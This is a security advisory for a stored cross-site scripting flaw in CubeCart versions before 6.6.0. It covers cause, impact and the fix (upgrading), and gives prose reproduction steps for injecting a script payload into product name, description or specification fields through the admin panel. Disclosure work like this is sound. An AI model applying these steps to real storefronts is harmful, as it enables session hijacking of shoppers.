CubeCart Stored Cross-Site Scripting Vulnerability

A stored cross-site scripting vulnerability has been identified in CubeCart versions prior to 6.6.0. This issue allows an attacker with administrative privileges to inject malicious JavaScript into several product fields. The injected scripts are saved in the database and executed when users view the affected product pages, potentially leading to session hijacking or unauthorized actions. The vulnerability arises from inadequate input sanitization and output encoding, allowing HTML and JavaScript to be stored and executed.

Impact

Exploitation of this vulnerability allows for stored cross-site scripting, where injected scripts are executed in the context of the user viewing the product page. This could result in session hijacking or unauthorized actions performed on behalf of the user.

Reproduction

To reproduce this vulnerability, log into the CubeCart admin panel with administrative rights. Navigate to 'Inventory' and select 'Products' to edit an existing product or create a new one. Inject a script payload, such as a JavaScript alert, into the 'Product Name', 'Description', or 'Specification' fields. After saving the changes, view the product page on the storefront to see the injected script execute.

Remediation

Users are advised to update CubeCart to version 6.6.0 or later, where this vulnerability has been fixed.